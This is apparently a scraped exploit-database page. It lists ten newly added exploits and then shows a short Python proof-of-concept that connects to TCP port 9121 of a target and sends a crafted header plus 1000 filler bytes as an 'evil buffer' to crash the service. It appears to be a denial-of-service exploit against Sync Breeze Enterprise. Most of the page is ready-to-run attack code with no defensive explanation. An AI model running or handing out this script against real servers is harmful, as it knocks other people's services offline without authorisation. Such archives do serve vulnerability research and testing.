
10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
31 lines
No EOL
654 B
Python
Executable file
31 lines
No EOL
654 B
Python
Executable file
#!/usr/bin/python
|
|
import socket
|
|
import sys
|
|
from struct import pack
|
|
|
|
try:
|
|
server = sys.argv[1]
|
|
port = 9121
|
|
size = 1000
|
|
|
|
inputBuffer = b"\x41" * size
|
|
|
|
header = b"\x75\x19\xba\xab"
|
|
header += b"\x03\x00\x00\x00"
|
|
header += b"\x00\x40\x00\x00"
|
|
header += pack('<I', len(inputBuffer))
|
|
header += pack('<I', len(inputBuffer))
|
|
header += pack('<I', inputBuffer[-1])
|
|
|
|
buf = header + inputBuffer
|
|
|
|
print("Sending evil buffer...")
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((server, port))
|
|
s.send(buf)
|
|
s.close()
|
|
|
|
print("Done!")
|
|
|
|
except socket.error:
|
|
print("Could not connect!") |